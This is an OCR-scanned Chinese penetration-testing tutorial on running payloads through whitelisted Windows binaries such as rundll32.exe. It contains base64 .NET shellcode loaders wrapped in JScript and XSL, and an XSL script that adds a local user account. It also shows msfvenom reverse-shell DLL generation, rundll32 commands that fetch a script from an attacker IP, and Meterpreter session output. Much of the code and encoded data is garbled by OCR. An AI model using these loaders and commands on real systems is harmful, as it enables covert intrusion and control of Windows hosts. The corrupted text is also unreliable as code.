"dHJ5Ai9TeXNOZwWOuUmVmbGV;j dGlvbi5NZWi1iZXJJbmzvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" - 
"CQuAAAA JDQAAAAQEAAAAL ANS C3R1bSSSZWZSZWNOaWOuLk11bWJlckluZzm9TZXJpYWxpemF0aw9u" + 
"SG9sZGVyBgAAAAROYW1 IDEFzc2Vt Ymx5TmFtZQlDbGFzcO5hbwUJU21nbmFOdXJlCk11bWJlclR5"- 
"cGUQR2VuZXJpYOFyZ3VtZW5OCwEBAQEAAwgNU31zdGVt L 1R5cGVbXQKKAAAACQYAAAA JCQAAAAYR" + 
"AAAALFNSC3RIbSSPYmplY3QgRHluYWipYOludm9rzShTeXNOZWOuT2 JqZWNOW10pCAAAAAOBCWAA" + 
"AALAAAAGEgAAACBTeXNOZWOUWG1s L1NjaGVtYS5YbWxwWYWx1ZUdldHRlcgYTAAAATVN5C3RIbS5Y"-* 
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZTiuZXVOcmF sLCBQdWJsaWNLZX1Ub2tlbjiiNzdh"- 
"NWM1NjESMzRIMDg5BhQAAAAHdGFyZ2V8MAKGAAAABhYAAAAaU31zdGVtL1JlZmxlYS3Rpb24uQXNz " * 
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAA JNWpAAAVAAAAQAAAD/ /WAAUAAAAAAAAABAAAAAAAAA" + 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh--6DgCOCcOhuAFMzSFUaG1z IHByb2dy" 
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"YwWOgY2Fubm9016JlIHJl1biBpbiBET1MgbW9kZSA4NDQokAAAAAAAAAFBFAABMAQMAVC1CX 
"AAAA4AAC1Q0SBCwAADAAAAAYAAAAAAAAOKQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA". 
"AAAAAAAAAIAAAAACAAAAAAAAAWBANQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAwCKkA 
"AESAAAAAQAAAQATAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAATAAAAAAAAAAAAAAAT TAAASAA A AA AAA AAAW 
"AAAALnR1eHQAAAAUCGAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAALAAAY CB C3 Jj AAAADATTAAABAU 
"AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmV SD 2MAAAWAAAAAY AAAAATAAAASAAAAAAAAAAAA. ` 
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAP ADAAAAAAAASAAAAATABQBE I gAA f ACAAAMAAAAAAAAA"! + 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQG LOBAAAC GAA" + 
"KAIAAAYAACOAAAAAAAAA/OiCAAAAYInlMCBkil1AwilIMil1IUi3I0D7dKJjH/rDxhfAISIMHPDQHH"s 
"AvJSVAtSEItKPItMEXj jSAHRUYCZIAHTiOkYAzpJizSLAdYx/6zBzwOBxz jgdfYDffg7fSRAi5FiL". 
"WCQBO2aLDEuLWBwBOASsEiwHQiUQkJFtbYVlaUf/gX19aixLr;jV1oMzIAAGh3cz JfVGhMdyYHiej/"« 
"GLiQAQAAKCRUUGSgp365A/9VqCmj AqAEEaAIAADWJ51BQUFBAUEBQaOOPS3-*D/1ZdqEFZXa Jm1dGH/" 
"1YXAdAr / Tgh170hnAAAAagBqBFZXaALZyF/ /1YP4AH42izZqQGgAEAAAVmoAaF ikU-X/1ZNTagBW'' 
"UidoAtnIX//Vg/gAfShYaABAAABqAFBOCy8PMP/VV2h1bKk1h/9VeXv8MJA*FCP/ / / *mb/ / / /AcMp" 
"xnXBw7vwtaJWagBT/9UAAAATMAYAZQAAAAEAABEAIFUBAACNBgAAASXQAWAABCQGAAAKCh YG j m1" - 
"AQAABHACAAAEKAMAAAY LBh YHb i gHAAAKBO5pKAgAAAOAf gKAAAOMFg1.-- COAAChMEFhYHEQQWE gMo" + 
"BAAABgwIFSgFAAAGJisAKKOgABAAAIABAAAEHOCAAgAABCpCUOpCAQABAAAAAAAMAAAAd j QUMCAZ + 
"MDMxOQAAAAAF AGwAAABgAgAAI34AAMWCAABKAWAAI1NOCmluZ3MAAAAAMAY AAAGAAAA j VVMAOAY A" + 
" ABAAAAA j R1V JRAAAAEqGAAAOAQAAIO0 JSb2IAAAAAAAAAAgAAAVf VA j Q JAgAAAP о 1MWAWAAABAAAA" + 
"DWAAAAQAAAADAAAABGAAAAWAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEAAAAB "+ 
"AAAAAQAAAAAACGABAAAAAAAGAE SARAAGAF SBPWEGAHCBPWEGAKY BhgEGAMY BhgEGAPCBRAAGAEEC" + 
"hgEGAFWCRAAGAJgChgEGAKCCRAAGAKOCRAAGANACRAAGAAIDAWIGABQDAWIGAECDNWMAAAAAAQAA" "+ 
" AAAAAQABAAEAEAAhACKABQABAAEAAAAAAPWBAAAF AAMABWAT AQAAZ g LAACEABAAHABEAXQASABEA " + 
"aAASABMBhAI-*AFAgAAAAAIYYUgAKAAEAWCEAAAAAKQBYAAAAAQAAAAAAgACRIHBAFQABAAAAAACA " + 
"AJEgjAAdAAUAAAAAAIAAkSCZACGACWAX I GAAAACRGDADDgANAAAAAQCt AAAAAQCSAAAAAWC  AAAA + 
"BADPAAAAAQDZAAAAAgDSAAAAAWDAAAAABAAHAQAABQANAQAABgAdAQAAAQAOAQAAAgAWAREAUQAU" + 
"ACEAUgAOACKAUgAKAAKAUgAKADKkAUGAKAEKAWA JCAGEA1w JKAGkACgNPAGEADWNY AHEAUgBKAHKA" + 
"UgAKACCAWWASACA4AEWBDACAAGWBy AGMAKWASAAGABgCRAAEAVQEAAAQAWWANAWABBWB/AAEAAAE J "+ 
"AIWAAQAAAQSAmQABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAAOQBAAAEAAAAAAAAAAAAAAABADSA " + 
"AAAAAAQAAWAAAAABTWO kdWx 1PgB3bW1f Y3NfZGxsX3BhewxvYWQuZGxsAFByb2dy YW9AU2h 1bGxD 
"b2RlITGFibmNoZXIADbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAuY3RvcgBNYWluAE1FTV9DTO1NSVQA" + 
"UEFHRV9FWEVDVVRFX1 JFQURXUK1URQBWaXJOdWF sQWxsb2MAQ3J1YXR1VGhyZWFkAFdhaXRGb3J T "+ 
"aw5nbGVPYmplY3QAbHBTdGFydEFkZHIAc216ZQBmbEFsbG9j YXRpb25UeXBlAGZSUHJvdGV j dABs " 
"cFRocmVhZEFOdHJpYnVOZXMAZHdTdGF j a3NpemUAbHBTdGF ydEFkZHJ1c3MAcGFy YWOAZHdDcmVh "+ 
"dGlvbkzsYwdzAGxwVGhyZWFkSwWQAaEhhbmRsZQBkd01pbGxpc2V jb25kcwBTeXNOZWOUU2V;j dXJp "^ 
"dHkuUGVybWlzc21vbnMAU2V;j dXJpdH1QZXJtaXNzaw9uQXROcm1idXRlAFNlY3VyaXRSQWNOawWOu' + 
"AFNSC3RIbSSSdw50aWw1lLkNvbXBpbGVyU2Vydm1 j ZXMAQ29tcG1sYXRpb25SZWxheGFOawW9ucOFO" ^ 
"dHJpYnVezQBSdw50aW11Q29tcGFOaWJpbGlOeUFOdHJpYnVOZQB3bwlfY3NfZGxsX3BheWxvYWQA" + 
"Qnl10ZQA8UHJpdmFOZUltcGxlbwWVudGFOaW9uRGVOYWlscz57MEQxQTVERjAtRDZCNyOORUUzLU JB" * 
"QzItOTYOMUUyRE JCMDNFf QBDb21waWx1ckdlbmVyYXRlZEFOdHJpYnVOZQBWYWXx1ZVR5cGUAXA9T "+ 
"dGFOaWNBcnJheUluaXRUeXB1U216ZTOzNDEAJCRtZXRob2QweDYwMDAwMDItMQBSdW50aW11SGVs"-* 
"cGVycwBBcnJheQBSdW50aWw11RmllbGRIYWSkbGUASWS5pdGlhbGleZUFycmF5AEludFBOcgBvcF9F" * 
"eHBsaWNpdABTeXNOZWOuUnVudGltZzS5JbnRlcm9wU2Vydml;jZXMATWFyc2hhbABDb3B5AFplcm8A" + 
"RGxsSW1wb3JO0QXROcmlidXRlAGtlcm51bDMyAC5jY3RvcgBTeXNOZWOUU2V; dXJpdHKAVW52ZX Jp" ^ 
"ZmlhYmxlQ29kZUFOdHJpYnVOZQAAAAAAAyAAAAAAAPBdGg231uNOusKWQeLbsDA4ACLd6XFYZNOC J " + 
" Ay AAAQMAAAECBgkHAAQJICQKICQOABhg JCQkYCRA JBQACCRg JBSABARENBCABAQgEAQAAAAMGERAH" + 
"AAIBEikRLQQAARGKCAAEAROFCBgIAgYYCACFHQUJGAKkYBCABAQAIAQAIAAAAAAAeAQABAFQCF 1d y" + 
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" YXBOb25FeGNIcHRpb25UaH Jvd3MBgJ4uAYCEUSlzdGVtLINlY3VyaXRSLIBlemipc3Npb25zL1NI" 

" YSVyaXRSUGVybwlzc21vbkFOdHJpYnVOZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wL jAuMCwgQ3VS "+ 
"dHVyZTiuZXVOcmFsLCBQdWJsaWNLZX1Ub2tlbj1iNzdhNWMiNjESMzRIMDg5FQFUAhBTa21wVmVy" * 
"aWwZpY2FO0aWw9uAQAAA0gpAAAAAAAAAAAAAPADAAAATIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWKQAA " + 


"AAAAAAAAXONVCKRSbE1haWAADXN j b3J1ZS5k bGWAAAAAAP8 LACAAEAAAAAAAAAAAAAAAAAAAAAAA" + 
" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 


"АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"ДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"ДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 





" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAGAAAAAAAAAAAAAAAAAAA "+ 
" AQABAAAAMAAAGAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAF hAAABGAgAAAAAAAAAAAABOA j QAAABW" + 
" AFHAXWBWAEUAUGBTAE KATWBOAF BASQBOAE YATWAAAAAAVQT V / ДАААФАААААААААААААААААААААА" + 
"PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAF YAY QBYAEY AaQBSAGUASQBUAGYADWAA" + 
" AAAA JAAEAAAAVABYAGEADgBZAGWAY QBOAG KAbWBUAAAAAAAAAL AE 1 AEAAAEAUWBOAHIAaQBUAGCA" + 
"RgBpAGWAZQBJAG4AZGBVAAAASAEAAAEAMAAWADAAMAAWADQAY GAWAAAAL AACAAEARGBpAGWAZQBE "+ 
" AGUACWB j AH TAaQBWwAHQAaQBVAG4AAAAAACAAAAAWAAGAAQBGAGKADABLAFYAZQBYAHMAaQBVAG4A" + 
" AAAAADAAL gAWAC4AMAAUADAAAABQABCAAQB JAG4AdAB LAH ITAbgBhAGwAT gBhAGOAZQAAAHCAbQBp" + 
" AFBAYWBZAF8AZABSAGWAXWBWAGEAe QBSAGBAY QBKAC4AZABSAGWAAAAAACGAAGABAEWAZQBNAGEA" + 
"bABDAGBACABSAHIAaQBnAGgAdAAAACAAAABYABCAAQBPAHIAaQBnAGkAbgBhAGWARgBpAGWAZQBU" + 
"AGEAbQBIAAAAdwBtAGKAXwWB j AHMAXwBKAGWADAB f AHAAY QB5AGWAbWBhAGQAL gBKAGWADAAAAAAA" + 
"NAAIAAEAUAByAGBAZAB1AGMAdABWAGUACGBZAGKAbwWBUAAAAMAAUADAAL GAWACAAMAAAADGACAAB " + 
" AEEACWBZAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBVAGAAAAAWACAAMAAUADAAL gAWAAAAAAAAAAAA" + 
"АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА!' + 
" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
"ДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА"+ 





"АДАДАААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 





"АДААДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"ААДАДААДАААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"АДДААДАДААДААДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"АДАДАДАААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА" + 
"АДААДАДААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА"+ 





"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + 
"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAKXAAAACQYAAAA J FgAAAAYaAAAA JAN5 CSR1bS5SZWZS "+ 
"ZwNOaW9uLkFzc2VtYmx5IExvYWQoQnlOZVtdKQgAAAAKCWAA" ; 

Var entry class - 'ShellCodeLauncher.Program'; 


Ery 4 
setversion(); 
var stm - base64ToStream(serialized obj); 
var fmt - new ActiveXObject('System.Runtime.Serialization.Formatters.Binary. 
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` 


var al = new ActiveXObject('System.Collections.ArrayList'); 
var d - fmt.Deserialize 2(stm); 4 ч 
al.Add(undefined); 

var o - d.DynamicInvoke(al.ToArray()).CreateInstance(entry class); 


} catch (e) ( 
debug(e.message); 


]]> </ms:script> 
</stylesheet> 


Micropoor 2003.xsl: 


<?xml version='1.0'?> 
<stylesheet 
xmlns-"http://www.w3.0rg/1999/XSL/Transform" xmlns:ms="urn: schemas -microsoft-con 
xmins:user="placeholder" 

versionz"1.0"» 

«output method="text"/> 

«ms:script implements-prefix-"user" language="JScript"> 

«1[CDATA[ 





var г = new ActiveXObject("wWScript.Shell").Run("net user Micropoor Micropoor /ac 


11> </ms:script> 
«/stylesheet» 
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基于 白 名 单 Rundll32.exe 执 行 payload 第 十 一 季 


_ Ж: 请 多 喝 点 热 水 或 者 凉 白 开 ， 可 预防 肾 结 石 ， 通 风 等 。 


Rundll32 简 介 : 


Rundll32.exe 是 指 " 执 行 32 位 的 DLL 文 件 "。 它 的 作用 是 执行 DLL 文 件 中 的 内 部 函数 ,功能 就 是 以 命令 
行 的 方式 调用 动态 链接 程序 库 。 


”说 明 : Rundll32.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Wmic 命 令 可 识别 ， 需 注意 
x86，x64 位 的 Rundll32 调 用 。 


— Windows 2003 默认 位 置 ; 
C: \Windows\System32\rund1132.exe 
C: \Windows\SysWOW64\rund1132.exe 
— Windows 7 默认 位 置 : 
C: NWindowsNSystem32Nrundll32.exe 
C: NindowsNSysWOW64Nrundll32.exe 


攻击 机 : 192.168.1.4 &Debian 


ЖМ): 192.168.1.119&Windows 2003 





| 192.168.1.5 &Windows 7 
基于 远程 加 载 (1): 
_ 配置 攻击 机 msf: 


| Ж: x86 payload 
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- E v В ж 
msf exploit(multi/handler) > show options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse_tcp): 





Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be | 
LPORT 53 yes The listen port 


Exploit target: 


Id Name 


0  Wildcard Target 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 


asf explolt(multi- handler) > show options 
Module options (exploit/multi/handler); 


Name Current Setting Required Description 


Payload options (windo eterpreter/r 


Name Current Setting Required Description 


Exit technique { '', seh, thread, proc 


The listen add 
The listen port 
-xploit target: 
Id Name 


0 wildcard Target 


4 


maf exploit (multi handler) 





靶 机 执行 : 


C: \Windows\SyswOW64\rund1132.exe javascript:"N..Nmshtml,RunHTMLApplication ";doc 


it: x64 rundll32.exe 


C: Users { : 54Xrundll32.exe БЕТГЕ А ^ ML eer 


"script:http://192. 168.1. 4/Rundl132. she] 


< 


;Getobjecti 
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msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 





[*] Sending stage (179779 bytes) to 192.168.1.5 


ІЗІ Meterpreter session 57 opened (192.168.1.4:53 -> 192.168.1.5:41274) at 2019. 


meterpreter » getuid 


Server username: John-PC\John 


meterpreter » getpid 


Current pid: 7064 


meterpreter » 


exploit (multishandler}) > exploit 


Started reverse TCP handler on 192. 
Sending age (17 : i 
Meterpreter оп 57. 0 ‚4:53 ->.192.168.1.5:41274) at 2019-01-19 04:13:26 -0500 


meterpreter » getu 


Server us 


Current pid 
neterpreter > 





基于 本 地 加 载 (2): 
payload 配 置 : 


msfvenom -a x86 --platform windows -p windows/meterpreter/reverse tcp LHOST-192. 


ivar ANN /ht ns tenon) «a x86 platform windows -p wirldows/meterpreter/reverse tcp. LHOST«192.168.1,44LPORT«S3 -f dll »Micropoor, Rund1132. dll 
or badchars specified. outputting raw payload * 
341 bytes 
dll files 5120 bytes 


靶 机 执行 : 





G:XUsersVTohnzrund]432 she) 132 .d11 ;Góntro T: RurnDLL С: у er s NJohnYDesktop Wi cropoo 


roRundll32.d14 





» 


msf exploit(multi/handler) » exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 
[*] Sending stage (179779 bytes) to 192.168.1.5 


[*] Meterpreter session 63 opened (192.168.1.4:53 -» 192.168.1.5:43320) at 2019- 


meterpreter » getuid 
Server username: John-PC\John 
meterpreter » getpid 


Current pid: 6656 


3 -> 192.168.1.5:43320) at 2019-01-19 04:34:59 -0500 


» getuid 
me: Јоһп-Р! 





Windows 2003: 


rundll32.exe javascript:"\..\mshtml.d11,RunHTMLApplication ";eval("w-new Activex 


Ж: 如 靶 机 支持 powershell， 调 用 powershell 更 贴 合 实战 。 
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C:\Documents and SettingsNñdministrarcorNSE [HR] prund1132 .exe jasascript:UN..Smshtpni 

š 4 dn ; d 5 ` 4% s 
-d11.RunHTMLApplication ";eval("u-neu fictiveXObject C"WScript.She11N"5;u. Punan, 
stscN">;windou.close(>")>; 





imo: | 


取消 | Soo | 选项 @) >| 








| 83%: Rundll32 shellcode 
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<?xml versionz"1.0"?» 


«package» 


«component id="Micropoor"> 


«script language="JScript"> 
«1[CDATA[ 


function setversion() í 


function debug(s) í) 
function base64ToStream(b) í 
var enc - new ActiveXObject("System.Text.ASCIIEncoding"); 
var length - enc.GetByteCount 2(b); 
var ba - enc.GetBytes 4(b); 
var transform = new ActiveXObject("System.Security.Cryptography.FromBase6A4Tr 
ba - transform.TransformFinalBlock(ba, 0, length); 
var ms - new ActiveXObject("System.IO.MemoryStream"); 
ms.Write(ba, 0, (length / 4) * 3); 
ms.Position - 0; 


return ms; 


Var serialized obj = " AAEAAAD/ / / / /AQAAAAAAAAAEAQAAAC JT eEXNOZWOURGVSZWdhdGVTZXIpYh 


"AWAAAANEZWx1Z2FOZQdOYXINZXQWB211. dGhvZDADAWMWU31zdGVtLkRIbGVnYXRLU2VyaWF saxph"'+ 
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"dGlvbkhvbGRlci tEZWx1Z2FOZUVUdHJSIlNSCSRIDSSEZWXIZ2FOZVNlcmlhbGlGYXRpb25Ib2xk", 
"ZXIvU31zdGVtL1JlzmxlY3Rpb24uTWVtYmVySW5mbi1NlcmlhbGleYXRpb25Ib2XxkZXI JAGAAAAKD "4 
"AAAACQQAAAAEAGAAADBT eXNOZWOURGVSZWdhdGVTZXJpYwxpemF OaW9uSG9SZGVyYKORLDGVnYXRI"+ 
"RW58cnkHAAAABHRSCGUIYXNZZWiibHkGdGFyZ2VOEnRhcmdldFR5cGVBC3N1bWJSseQ50YXJnZXRU" 
"eXBlTmFtZQptZXRob2ROYW11DWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5C3RlbSSEZWXlZ2FO0ZVN]" 
"cmlhbGle6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5C3RlbS5SdW50aW11LlJlbW90" 
"aW5nLk1lc3Nhz21uZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249MiA4wL jAu' 
"MCwgQ3VsdHVyZT1uZXVOcmFsLCBQdWJsaWwNLZX1Ub2t1bji1iNzdhNWMi1NjE5MZRlIMDg5BgcAAAAH" + 
"dGFyZ2VOMAkGAAAABgkAAAAPUS31zdGVt LkR1bGVnYXR1BgoAAAANRHluYWi1pYOludm9rZQOoEAwAA" 
"ACJTeXNOZWOuRGVsZWdhdGVTZXJpYWxpemF8aW9uSG9sZGVyAwAAAAhEZWXx1Z2F0ZQdOYX JnZXQw" 
"B211dGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxl22F0ZUVu"- 
"dHJ5Ai9TeXNOZWOuUmVmbGV j dG1vbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" + 
"CQWAAAA JDQAAAAQEAAAAL1NSC3R1bS5SZWZsZWNOaW9uLk11bWJlckluzm9TZXJpYWxpemFOaW9u"- 
"SG9sZGVyBgAAAAROYW1 1DEFzc2VtYmx5TmFtZQlDbGFzcO5hbWwUJU21nbmFOdXJlCki11bWJlclR5"- 
"CGUQR2VuZXJpYOFyZ3VtZW5OcwEBAQEAAwgNUS1zdGVtLlR5cGVbXQKKAAAACQYAAAA JCQAAAAYR" + 
"AAAALFNSCSRIbSSPYmplY3QgRHluYWipYOludm9rzShTeXNOZWOuT2 JqZWNOW10pCAAAAAOBCWAA " + 
"AAIAAAAGEgAAACBTeXNOZWOUWG1SsLINjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVNSC3R1bS5Y'-* 
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZTiuZXVOcmFsLCBQdWJsaWNLZX1Ub2t1bj1iNzdh'-* 
"NWMiNjESMzRIMDg5BhQAAAAHdGF yZ2VOMAkGAAAABhYAAAAaU31zdGVt L1 J1ZmxlY3Rpb24uQXNz "- 
"ZW1ibHKGFWAAAARMb2FkCg8MAAAAABQAAA JNWDAAAWAAAAQAAAD/ /WAAUAAAAAAAAABAAAAAAAAA "+ 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh--6DgCOCcOhuAFMzSFUaG1z IHByb2dy " 
"YWOgY2Fubm99IGJlIHJibiBpbiBETi1MgbW9kZSANDQoOKAAAAAAAAAFBF AABMAQMAVCA1CXAAAAAAA "4 
" AAAAAAACIQSBCWAADAAAAAY AAAAAAAAOKGAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA "+ 


"AAAAAAAAAIAAAAACAAAAAAAAAVBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAWC KA" + 
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"AESAAAAAQAAADAIAAAAAAAAAAAAAAAAAAAAAAAAAY AAADAAAAAAAAAAAAAANAAAAAAAAAAAAAAAA " + 
x IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAATAAAAAAAAAAAAAAATIIAAASAAAAAAAAAAA"'+ 
_ "AAAALRRLeHQAAAAUCgAAACAAAAAMAAAAAGAAAAAAAAAAAAAAAAAATIAAAYCBy C3 J j AAAADAIAAABA" + 
- WAAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAUCmVsb2MAAAWAAAAAYAAAAAIAAAASAAAAAAAAAAAA'+ 


"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPADAAAAAAAASAAAAATABQBEIgAAf ACAAAMAAAAAAAAA " + 





QgIoBAAACgAA'" + 
"KAIAAAYAACOAAAAAAAAA/ 0i CAAAAYInlMCBkii1Awi1IMiiIUi3IOoD7dKJjH/rDxhfAISIMHPDQHH"- 
"AyJSVAtSEItKPItMEXj jSAHRUYtZIAHTiOkYAzpJizSLAdYx/6zBzwOBxz j gdf YDf f g7 f SRTSFiL"- 
"WCQBO2aLDEuLWBwBOAsEiwHQiUQkJFtbYVlaUf/gX19aixLrjVi1oMzIAAGh3czJfVGhMdyYHiej/"* 
"GLiQAQAAKCRUUGgpgGsA/9VqCmj AqAEEaAIAADWJ51BQUFBAUEBQa00P3-D/1ZdqEFZXa Jm1 dGH/ " 
"1YXAdAr /Tgh170hnAAAAagBqBFZXaALZyF/ /1YPA4AH42izZqQGgAEAAAVmoAaFikU-*X/1ZNTagBW' + 
"U1doAtnIX//Vg/gAfShYaABAAABgAFBOCy8PMP/VV2hibk1h/9VeXv8MJA-*FcP/ / / *mb////AcMp" * 
"xnXBw7vwtaJWagBT/9UAAAATMAYAZQAAAAEAABEAIFUBAACNBgAAASXQAWAABCQGAAAKCh Y G j m1." + 
"AQAABHACAAAEKAMAAAY LBhYHbigHAAAKBO5pKAgAAAOAf gkAAAOMF g1--CQAAChMEFhYHEQQWEgMO "+ 
"BAAABgwIFSgFAAAGJiSsAKkOgABAAAIABAAAEHOCAAgAABCpCUOpCAQABAAAAAAAMAAAAd j QuMCAZ " 
"MDMXOQAAAAAFAGWAAABgAGAAI34AAMWCAABKAWAAT 1NOcm1uZ 3MAAAAAMAYAAAGAAAA j VVMAOAYA" + 
"ABAAAAAjR1V JRAAAAEgGAAAO0AQAATO Jsb2 IAAAAAAAAAAgAAAVf VA j QJAgAAAP Oo 1MWAWAAABAAAA" + 
"DWwAAAAQAAAADAAAABgAAAAWAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEAAAAB " + 
"AAAAAQAAAAAACGABAAAAAAAGAE SARAAGAF s BPWEGAHCBPWEGAKYBhgEGAMYBhgEGAPCBRAAGAEEC'" + 
"hgEGAFwCRAAGAJgChgEGAKCCRAAGAKOCRAAGANACRAAGAAIDAWIGABQDAWIGAECDNWMAAAAAAQAA" + 
"AAAAAQABAAEAEAAhACKABQABAAEAAAAAAPWBAAAFAAMABWwATAQAAZ g ITAACEABAAHABEAXQASABEA" + 
"aAASABMBhAI+AFAGAAAAATY YUGAKAAEAWCEAAAAAK QBYAA4AAQAAAAAAGACRIHSAF QABAAAAAACA" + 
"AJEg j AADAAUAAAAAATAAKSCZACGACWAX I gAAAACRGDADDgANAAAAAQCtAAAAAGCSAAAAAWC+AAAA" + 


"BADPAAAAAQDZAAAAAGDSAAAAAWDAAAAABAAHAQAABQANAQAABgAdAQAAAQAOAQAAAgAWAREAUGAU " + 
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" ACEAUgAGACKAUSAKAAKAUgAKADKAUGAKAEKAWAJCAGEATWJKAGKACQNPAGEADWNYAHEAUGBKAHKAY | 
"UgAKACCAWwWASACAAEwBpACAAGwByAGMAKWASAAgABgCRAAEAVQEAAAQAWWAnAWABBWB// AAE AAAE Jn, 
"AIWAAQAAAQSAmQABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAAOQBAAAEAAAAAAAAAAAAAAABAD SAN + 
"AAAAAAQAAWAAAAABTWO9 kdWx 1 PgB3bWlfY3NfZGxsX3BheWxvYWQuZGxsAFByb2dy YWOAU2h 1bGxp" + 
"b2RlITGFibmNoZXIAbXNjb3JsaWIAUSlzdGVtAE9iamV;jdAAuY3RvcgBNYWluAE1FTV9DTO1NSVQA' 4. 
"UEFHRV9FWEVDVVRFX1 JFQURXUK1URQBWaXJOdWF sQWxsb2MAQ3 J1YXR1iVGhyZWFkAFdhaXRGb3 JT''4- 
"aw5nbGVPYmplY3QAbHBTdGFydEFKZHIAC216ZQBmbEFsbG9 j YXRpb25UeXB1AGZSUH Jvd6V j dABs" - 
"cFRocmVhZEFOdHJpYnVOZXMAZHdTdGF j a1NpemUAbHBTdGFydEFKZHJ1c3MAcGFyYWOAZHdDcmVvh" 4 
"dGlvbkZsYWdzAGxwVGhyZWFKSWQAaEhhbmRsZQBkd01pb6Gxpc2V jb25kcwBTeXNOZWOUU2V j dXJp 
"dHkuUGVybWlzc2lvbnMAU2VjdXJpdH1QZXJtaXNzaW9uQXROcmlidXRlAFNlYS3VyaXR5QWNOaWO9u" 
"AFNSC3RIbS5SdW50aW1lLkNvbXBpbGVyU2Vydml j ZXMAQ29tcGlsYXRpb25SZWxheGFOaW9ucOFO" 
"dHJpYnVOZQBSdW50aW11Q29tcGFOaWJpbGlOeUFOdHJpYnVOZQB3bWlfY3NfZGxsX3BheWxvYWQA" + 
"Qn10ZQA8UHJpdmFOZUltcGxlbwvudGFOaW9uRGVOYWlscz57MEQXQTVERjAtRDZCNyOORUUZLU JB" + 
"QzItOTYOMUUyRE JCMDNFfQBDb21waWxlckdlbmVyYXRlZEFOdHJpYnVOZQBWYWX1ZVR5CGUAX19T ' + 
"dGFOaWNBcnJheUluaXRUeXB1U216ZTOzNDEAJCRtZXRob2QweDYwMDAwMDItMQBSdW59aW11lSGVs"- 
"cGVycwBBcnJheQBSdW50awi1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AEludFBOcgBvcF9F "4 
"eHBsaWNpdABTeXNOZWOuUnVudGltzS5JbnRlcm9wU2VydmljZXMATWFyc2hhbABDb3B5AFplcm8A" + 
"RGxsSW1wb3JOQXROcmlidXRlAGtlcm5lbDMyAC5;jY3RvcgBTeXNOZWOuU2V j dXJpdHkAVW52ZX Jp " * 
